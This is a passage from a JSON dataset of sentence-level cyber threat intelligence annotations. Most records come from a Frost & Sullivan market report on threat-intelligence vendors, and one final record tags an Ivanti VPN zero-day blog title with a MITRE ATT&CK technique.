"mandiant-27_mandiant_report-p3-s3-65d569", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 3, "sentence_id": 3, "context_before": "Strategic Imperative\nand Growth\nEnvironment", "sentence_text": "Strategic Imperative\n•", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p3-s4-69c5d8", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 3, "sentence_id": 4, "context_before": "Strategic Imperative\n•", "sentence_text": "As the threat landscape continues to evolve with cyber threats becoming more sophisticated and complex, it is imperative that organizations shift to a proactive cybersecurity approach.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p3-s5-69b5f3", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 3, "sentence_id": 5, "context_before": "As the threat landscape continues to evolve with cyber threats becoming more sophisticated and complex, it is imperative that organizations shift to a proactive cybersecurity approach.", "sentence_text": "Cyber threat intelligence (CTI) provides the necessary information to achieve that.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p3-s6-dc3bf4", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 3, "sentence_id": 6, "context_before": "Cyber threat intelligence (CTI) provides the necessary information to achieve that.", "sentence_text": "Threat actors have become more specialized and organized in recent years; the rising number of attacks conducted by career criminals and nation-state groups has created concern among organizations of all sizes and industries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p3-s7-c6a033", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 3, "sentence_id": 7, "context_before": "Threat actors have become more specialized and organized in recent years; the rising number of attacks conducted by career criminals and nation-state groups has created concern among organizations of all sizes and industries.", "sentence_text": "Not only are tactics, techniques, and procedures more sophisticated, but also the time interval from vulnerability discovery to large-scale attack is rapidly decreasing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p3-s8-3aadbf", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 3, "sentence_id": 8, "context_before": "Not only are tactics, techniques, and procedures more sophisticated, but also the time interval from vulnerability discovery to large-scale attack is rapidly decreasing.", "sentence_text": "• Cyber threats are increasingly interwoven with geopolitical events; the Russo-Ukrainian War is an example, and the best representation of this trend.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p3-s9-137b15", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 3, "sentence_id": 9, "context_before": "• Cyber threats are increasingly interwoven with geopolitical events; the Russo-Ukrainian War is an example, and the best representation of this trend.", "sentence_text": "Threat actors are taking advantage of this situation, requiring organizations to actively monitor their threat landscape considering the impact of geopolitical events and their link with cyber threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p3-s10-68e5f0", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 3, "sentence_id": 10, "context_before": "Threat actors are taking advantage of this situation, requiring organizations to actively monitor their threat landscape considering the impact of geopolitical events and their link with cyber threats.", "sentence_text": "• CTI, which refers to the collection of insights about threats, is an essential component in any security program as it can provide a broad view of an organization’s threat landscape, offering visibility of trends and threat actors to proactively prepare and protect the business.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p3-s11-6fd529", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 3, "sentence_id": 11, "context_before": "• CTI, which refers to the collection of insights about threats, is an essential component in any security program as it can provide a broad view of an organization’s threat landscape, offering visibility of trends and threat actors to proactively prepare and protect the business.", "sentence_text": "Source: Frost & Sullivan K7FA-74 3", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p4-s12-4c6a90", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 4, "sentence_id": 12, "context_before": "Source: Frost & Sullivan K7FA-74 3", "sentence_text": "Most CTI vendors have developed in-house software-as-a-service (SaaS) offerings to enable clients to operationalize threat intelligence, thus tapping into the threat intelligence platforms (TIP) market.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p4-s13-4592bc", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 4, "sentence_id": 13, "context_before": "Most CTI vendors have developed in-house software-as-a-service (SaaS) offerings to enable clients to operationalize threat intelligence, thus tapping into the threat intelligence platforms (TIP) market.", "sentence_text": "• A similar trend is visible with regard to the digital risk protection (DRP) market.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p4-s14-b43248", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 4, "sentence_id": 14, "context_before": "• A similar trend is visible with regard to the digital risk protection (DRP) market.", "sentence_text": "The definition of CTI is evolving as it is now essential for a vendor to provide customers the means to operationalize their own threat intelligence while also including DRP use cases so they can understand their digital footprint exposure and risk.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p4-s15-81f3c6", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 4, "sentence_id": 15, "context_before": "The definition of CTI is evolving as it is now essential for a vendor to provide customers the means to operationalize their own threat intelligence while also including DRP use cases so they can understand their digital footprint exposure and risk.", "sentence_text": "Source: Frost & Sullivan K7FA-74 4", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p5-s16-b7e144", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 5, "sentence_id": 16, "context_before": "Source: Frost & Sullivan K7FA-74 4", "sentence_text": "Growth Environment\n•", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p5-s17-849370", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 5, "sentence_id": 17, "context_before": "Growth Environment\n•", "sentence_text": "As organizations increasingly need solutions and insights to help them deal with the ever-evolving threat landscape, demand for CTI will continue rising.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p5-s18-395a1c", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 5, "sentence_id": 18, "context_before": "As organizations increasingly need solutions and insights to help them deal with the ever-evolving threat landscape, demand for CTI will continue rising.", "sentence_text": "• Features that are important to deliver effective threat intelligence include:\no Actionability and reliability: information needs to be updated in real-time", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p5-s19-acea5e", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 5, "sentence_id": 19, "context_before": "• Features that are important to deliver effective threat intelligence include:\no Actionability and reliability: information needs to be updated in real-time", "sentence_text": "so it does not lose relevance and security teams can act upon it at the right time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p5-s20-86b931", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 5, "sentence_id": 20, "context_before": "so it does not lose relevance and security teams can act upon it at the right time.", "sentence_text": "Automation: it is necessary to make threat intelligence actionable for diverse teams; it empowers them to streamline workflows and trigger actions that mitigate threats automatically.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p5-s21-20eb18", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 5, "sentence_id": 21, "context_before": "Automation: it is necessary to make threat intelligence actionable for diverse teams; it empowers them to streamline workflows and trigger actions that mitigate threats automatically.", "sentence_text": "o Context: threat intelligence needs to be contextual so CISOs can strategize based on the analysis of industry and region-specific threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p5-s22-32c709", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 5, "sentence_id": 22, "context_before": "o Context: threat intelligence needs to be contextual so CISOs can strategize based on the analysis of industry and region-specific threats.", "sentence_text": "o Quality of the information: false positive rates should be minimal, and sources should be unique.\n•", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p5-s23-4dd51c", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 5, "sentence_id": 23, "context_before": "o Quality of the information: false positive rates should be minimal, and sources should be unique.\n•", "sentence_text": "A Frost & Sullivan study related to this independent analysis:\no Cyber Threat Intelligence and Threat Intelligence Platforms Markets, Forecast to 2024 Source: Frost & Sullivan K7FA-74 5", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p6-s24-7d2c76", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 6, "sentence_id": 24, "context_before": "A Frost & Sullivan study related to this independent analysis:\no Cyber Threat Intelligence and Threat Intelligence Platforms Markets, Forecast to 2024 Source: Frost & Sullivan K7FA-74 5", "sentence_text": "Frost Radar™\nCyber Threat\nIntelligence", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p7-s25-9fe28d", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 7, "sentence_id": 25, "context_before": "Frost Radar™\nCyber Threat\nIntelligence", "sentence_text": "Frost Radar™: Cyber Threat Intelligence Source: Frost & Sullivan K7FA-74 7", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p8-s26-e82324", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 8, "sentence_id": 26, "context_before": "Frost Radar™: Cyber Threat Intelligence Source: Frost & Sullivan K7FA-74 7", "sentence_text": "Frost Radar™: Competitive Environment • CTI is a highly fragmented and competitive market.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p8-s27-85c7b2", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 8, "sentence_id": 27, "context_before": "Frost Radar™: Competitive Environment • CTI is a highly fragmented and competitive market.", "sentence_text": "It encompasses a wide variety of players with differentiated profiles.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p8-s28-eec6ae", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 8, "sentence_id": 28, "context_before": "It encompasses a wide variety of players with differentiated profiles.", "sentence_text": "This demonstrates that there are many delivery methods for threat intelligence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p8-s29-e2cc6a", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 8, "sentence_id": 29, "context_before": "This demonstrates that there are many delivery methods for threat intelligence.", "sentence_text": "Offerings in this market vary according to a vendor’s DNA and focus.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p8-s30-724931", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 8, "sentence_id": 30, "context_before": "Offerings in this market vary according to a vendor’s DNA and focus.", "sentence_text": "• In a field of more than 25 global industry participants, Frost & Sullivan independently plotted 13 vendors in this Frost Radar™analysis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p8-s31-be7195", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 8, "sentence_id": 31, "context_before": "• In a field of more than 25 global industry participants, Frost & Sullivan independently plotted 13 vendors in this Frost Radar™analysis.", "sentence_text": "The Frost Radar™features the leading providers in the space as well as companies that stand out for particularly innovative strategies or comprehensive portfolios.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p8-s33-c1976e", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 8, "sentence_id": 33, "context_before": "•", "sentence_text": "It should be noted that:\no Companies that offer CTI solutions and a TIP have been plotted in the Frost Radar™for the global threat intelligence platforms market.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p8-s34-f6d6dd", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 8, "sentence_id": 34, "context_before": "It should be noted that:\no Companies that offer CTI solutions and a TIP have been plotted in the Frost Radar™for the global threat intelligence platforms market.", "sentence_text": "o Industry participants that were unable to actively engage in the research process were excluded from the Frost Radar™.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p8-s35-5e2716", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 8, "sentence_id": 35, "context_before": "o Industry participants that were unable to actively engage in the research process were excluded from the Frost Radar™.", "sentence_text": "These companies stand out thanks to their comprehensive offerings and use cases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p8-s36-309410", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 8, "sentence_id": 36, "context_before": "These companies stand out thanks to their comprehensive offerings and use cases.", "sentence_text": "Recorded Future and within the last three years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p8-s37-f8f84f", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 8, "sentence_id": 37, "context_before": "Recorded Future and within the last three years.", "sentence_text": "They all have strong positions on the Frost Radar™based on their high growth rates and their focus on riving industry innovation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p8-s38-014a19", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 8, "sentence_id": 38, "context_before": "They all have strong positions on the Frost Radar™based on their high growth rates and their focus on riving industry innovation.", "sentence_text": "Source: Frost & Sullivan K7FA-74 8", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p9-s39-aad55b", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 9, "sentence_id": 39, "context_before": "Source: Frost & Sullivan K7FA-74 8", "sentence_text": "Frost Radar™: Competitive Environment (continued)\n• Frost & Sullivan also plotted other notable competitors, such as Intel 471 and LookingGlass.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p9-s40-db0bed", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 9, "sentence_id": 40, "context_before": "Frost Radar™: Competitive Environment (continued)\n• Frost & Sullivan also plotted other notable competitors, such as Intel 471 and LookingGlass.", "sentence_text": "These companies have been present in the CTI space for a considerable time and continue to grow and evolve their offerings.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p9-s41-0f4c09", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 9, "sentence_id": 41, "context_before": "These companies have been present in the CTI space for a considerable time and continue to grow and evolve their offerings.", "sentence_text": "• Cybersixgill is another renowned vendor in the CTI market.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p9-s42-c3402b", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 9, "sentence_id": 42, "context_before": "• Cybersixgill is another renowned vendor in the CTI market.", "sentence_text": "Its strong threat intelligence capabilities allowed it to improve its position on the Frost Radar™Innovation Axis; however, it needs to continue expanding its use cases to increase its market share.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p9-s43-0d144e", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 9, "sentence_id": 43, "context_before": "Its strong threat intelligence capabilities allowed it to improve its position on the Frost Radar™Innovation Axis; however, it needs to continue expanding its use cases to increase its market share.", "sentence_text": "• The Frost Radar™also includes Cyberint and KELA, two Israeli-based companies with offerings that combine CTI and DRP use cases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p9-s44-8104c8", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 9, "sentence_id": 44, "context_before": "• The Frost Radar™also includes Cyberint and KELA, two Israeli-based companies with offerings that combine CTI and DRP use cases.", "sentence_text": "Even though they do not have a significant market share when compared with larger and more comprehensive vendors on the Frost Radar™, their innovative approach to threat intelligence helped them earn a high score on the Innovation Axis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p9-s45-ab226d", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 9, "sentence_id": 45, "context_before": "Even though they do not have a significant market share when compared with larger and more comprehensive vendors on the Frost Radar™, their innovative approach to threat intelligence helped them earn a high score on the Innovation Axis.", "sentence_text": "• With the acquisition of Blueliv, Outpost24 entered the CTI space with an offering that also addresses DRP use cases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p9-s46-af0837", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 9, "sentence_id": 46, "context_before": "• With the acquisition of Blueliv, Outpost24 entered the CTI space with an offering that also addresses DRP use cases.", "sentence_text": "The company has demonstrated strong growth rates within the last three years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p9-s47-5de472", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 9, "sentence_id": 47, "context_before": "The company has demonstrated strong growth rates within the last three years.", "sentence_text": "• Similarly, Gatewatcher recently entered the market with the acquisition of LastInfoSec.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p9-s48-8e6caa", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 9, "sentence_id": 48, "context_before": "• Similarly, Gatewatcher recently entered the market with the acquisition of LastInfoSec.", "sentence_text": "The company does not have a significant market share yet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p9-s49-288369", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 9, "sentence_id": 49, "context_before": "The company does not have a significant market share yet.", "sentence_text": "Source: Frost & Sullivan K7FA-74 9", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p11-s50-5efb96", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 11, "sentence_id": 50, "context_before": "Source: Frost & Sullivan K7FA-74 9", "sentence_text": "INNOVATION GROWTH FROST", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p11-s52-0f714b", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 11, "sentence_id": 52, "context_before": "PERSPECTIVE •", "sentence_text": "In the last three years, it has the CTI space.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p11-s53-1af4ed", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 11, "sentence_id": 53, "context_before": "In the last three years, it has the CTI space.", "sentence_text": "The company’s market share is CrowdStrike can leverage client threat taken steps to expand its CTI offering with above 15% and it has displayed remarkable telemetry from deployments of its endpoint new products and capabilities, such as Falcon growth rates over the last three years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p11-s55-e6c4f4", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 11, "sentence_id": 55, "context_before": "solution.", "sentence_text": "The company needs to continue Intelligence Recon (DRP) and Intel Graph.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p11-s56-facd60", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 11, "sentence_id": 56, "context_before": "The company needs to continue Intelligence Recon (DRP) and Intel Graph.", "sentence_text": "The building and communicating this core company also expanded into EASM with the • CrowdStrike has a clearly defined growth competitive advantage with a streamlined strategy that includes broadening its reach recent Reposify acquisition.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p11-s57-fbd1f6", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 11, "sentence_id": 57, "context_before": "The building and communicating this core company also expanded into EASM with the • CrowdStrike has a clearly defined growth competitive advantage with a streamlined strategy that includes broadening its reach recent Reposify acquisition.", "sentence_text": "marketing strategy that highlights the into mature as well as maturing user benefits of its CTI offering.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p11-s60-8ded87", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 11, "sentence_id": 60, "context_before": "•", "sentence_text": "Therefore, add-on modules.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p11-s61-4965f6", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 11, "sentence_id": 61, "context_before": "Therefore, add-on modules.", "sentence_text": "As CTI is foundational to the brand leadership, and industry recognition.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p11-s62-e5501b", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 11, "sentence_id": 62, "context_before": "As CTI is foundational to the brand leadership, and industry recognition.", "sentence_text": "effectively replace TIPs, as this would allow with its vision: the land-and-expand approach •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p11-s63-791cea", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 11, "sentence_id": 63, "context_before": "effectively replace TIPs, as this would allow with its vision: the land-and-expand approach •", "sentence_text": "Source: Frost & Sullivan K7FA-74 11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p12-s64-1e8d26", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 12, "sentence_id": 64, "context_before": "Source: Frost & Sullivan K7FA-74 11", "sentence_text": "Strategic\nInsights", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p13-s65-388d4f", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 13, "sentence_id": 65, "context_before": "Strategic\nInsights", "sentence_text": "Strategic Insights\nThe CTI market has grown significantly in recent years and will continue to do so.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p13-s66-2f1e5b", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 13, "sentence_id": 66, "context_before": "Strategic Insights\nThe CTI market has grown significantly in recent years and will continue to do so.", "sentence_text": "As the threat landscape evolves, organizations will demand more threat intelligence to enable a proactive 1 approach to cybersecurity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p13-s67-13bc52", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 13, "sentence_id": 67, "context_before": "As the threat landscape evolves, organizations will demand more threat intelligence to enable a proactive 1 approach to cybersecurity.", "sentence_text": "The ever-evolving threat landscape has proven that threat intelligence needs to be more than just 12 IoC lists.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p13-s68-acfc53", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 13, "sentence_id": 68, "context_before": "The ever-evolving threat landscape has proven that threat intelligence needs to be more than just 12 IoC lists.", "sentence_text": "To provide actionable and contextual threat intelligence, CTI providers are expanding into other market segments in the threat intelligence space.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p13-s69-cfe616", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 13, "sentence_id": 69, "context_before": "To provide actionable and contextual threat intelligence, CTI providers are expanding into other market segments in the threat intelligence space.", "sentence_text": "Source: Frost & Sullivan K7FA-74 13", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p14-s70-c87aff", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 14, "sentence_id": 70, "context_before": "Source: Frost & Sullivan K7FA-74 13", "sentence_text": "Frost Radar™\nAnalytics", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p15-s71-0c5cc4", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 15, "sentence_id": 71, "context_before": "Frost Radar™\nAnalytics", "sentence_text": "VERTICAL AXIS This is a comparison of a company’s market share relative to its competitors in a given market space for the previous 3 years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p15-s72-865e88", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 15, "sentence_id": 72, "context_before": "VERTICAL AXIS This is a comparison of a company’s market share relative to its competitors in a given market space for the previous 3 years.", "sentence_text": "sales and marketing strategies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p15-s73-cde1f5", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 15, "sentence_id": 73, "context_before": "sales and marketing strategies.", "sentence_text": "• GI4: VISION AND STRATEGY This is an assessment of how well a company’s growth strategy is aligned with its vision.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p15-s74-137d13", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 15, "sentence_id": 74, "context_before": "• GI4: VISION AND STRATEGY This is an assessment of how well a company’s growth strategy is aligned with its vision.", "sentence_text": "Are the investments that a company is making in new products and markets consistent with the stated vision?\n• GI5: SALES AND MARKETING This is a measure of the effectiveness of a company’s sales and marketing efforts in helping it drive demand and achieve its growth objectives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p16-s76-ea568e", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 16, "sentence_id": 76, "context_before": "K7FA-74 15", "sentence_text": "• II4: MEGA TRENDS LEVERAGE to customers’ changing needs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p16-s77-fe3841", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 16, "sentence_id": 77, "context_before": "• II4: MEGA TRENDS LEVERAGE to customers’ changing needs.", "sentence_text": "An explanation of Mega Trends can be found here.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p16-s78-9c3430", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 16, "sentence_id": 78, "context_before": "An explanation of Mega Trends can be found here.", "sentence_text": "• II5: CUSTOMER ALIGNMENT This evaluates the applicability of a company’s products/services/solutions to current and potential customers, as well as how its innovation strategy is influenced by evolving customer needs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p17-s80-e6d935", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 17, "sentence_id": 80, "context_before": "K7FA-74 16", "sentence_text": "Legal Disclaimer\nFrost & Sullivan is not responsible for any incorrect information supplied by companies or users.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p17-s81-abe90d", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 17, "sentence_id": 81, "context_before": "Legal Disclaimer\nFrost & Sullivan is not responsible for any incorrect information supplied by companies or users.", "sentence_text": "Quantitative market information is based primarily on interviews and therefore is subject to fluctuation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p17-s82-0cd4d4", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 17, "sentence_id": 82, "context_before": "Quantitative market information is based primarily on interviews and therefore is subject to fluctuation.", "sentence_text": "Frost & Sullivan research services are limited publications containing valuable market information provided to a select group of customers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p17-s83-b35feb", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 17, "sentence_id": 83, "context_before": "Frost & Sullivan research services are limited publications containing valuable market information provided to a select group of customers.", "sentence_text": "For information regarding permission, write to: permission@frost.com", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s1-73d9ff", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation | Google Cloud Blog Threat Intelligence Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation January 31, 2024 Written by: Matt Lin, Robert Wallace, John Wolfram, Dimiter Andonov, Tyler Mclellan", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Ivanti Connect Secure VPN zero-day exploitation", "entities": [ { "text": "Zero-Day Exploitation", "start": 62, "end": 83, "label": "Action" }, { "text": "Ivanti Connect Secure VPN", "start": 36, "end": 61, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s2-132d4a", "source": "mandiant", 